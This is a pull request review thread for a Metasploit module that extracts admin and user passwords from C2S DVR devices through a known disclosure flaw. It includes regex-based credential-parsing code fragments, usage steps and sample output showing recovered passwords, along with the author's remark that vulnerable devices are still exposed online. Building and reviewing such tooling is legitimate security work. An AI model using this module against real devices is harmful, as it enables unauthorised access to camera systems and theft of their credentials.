### PR TITLE
c2s dvr password disclosure

### PR DESCRIPTION
**Pull request by h00die**
Simple PR with a 2016 password disclosure on a DVR system from EDB.  I created a mock page to emulate the vulnerability.  There are still some live ones on the internet according to shodan, not sure if they are vuln or not.

## Verification

- [ ] install the mock page, its super quick and easy.
- [ ] Start `msfconsole`
- [ ] `use exploit/auxiliary/gather/c2s_dvr_password_disclosure`
- [ ] set rhosts
- [ ] `exploit`
- [ ] **Verify** it finds creds

### CODE REVIEW

**Comment by jmartin-r7** [comment]
`./tools/dev/msftidy.rb` all the things please.

File: modules/auxiliary/gather/c2s_dvr_password_disclosure.rb [hunk 1]
```diff
@@ -0,0 +1,74 @@
...
+      end
+
+      if res.body =~ /pw_adminpw = "(.+)";/
+        print_good("Found: admin:#{$1}")
+        store_valid_credential(
+          user:         'admin',
+          private:      $1,
+          private_type: :password
+        )
+      end
```
Comment (bcoles) [inline modules/auxiliary/gather/c2s_dvr_password_disclosure.rb]: `modules/auxiliary/gather/c2s_dvr_password_disclosure.rb:59 - [WARNING] Spaces at EOL`

```suggestion
      end
```

File: modules/auxiliary/gather/c2s_dvr_password_disclosure.rb [hunk 2]
```diff
@@ -0,0 +1,74 @@
...
+      if res.body =~ /pw_adminpw = "(.+)";/
+        print_good("Found: admin:#{$1}")
+        store_valid_credential(
+          user:         'admin',
+          private:      $1,
+          private_type: :password
+        )
+      end  
+
+      if res.body =~ /pw_userpw = "(.+)";/
```
Comment (wvu-r7) [inline modules/auxiliary/gather/c2s_dvr_password_disclosure.rb]: Maybe make it non-greedy: `(.+?)`.

**Comment by bcoles** [comment]
```
msf5 auxiliary(gather/c2s_dvr_password_disclosure) > run

[+] Found: admin:12345
[+] Found: user:56789
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Review by bcoles — APPROVED** [review]

**Comment by bcoles** [comment]
# Release Notes

Add C2S DVR Management Password Disclosure module to retrieve credentials from C2S DVR devices.

**Pull request merged**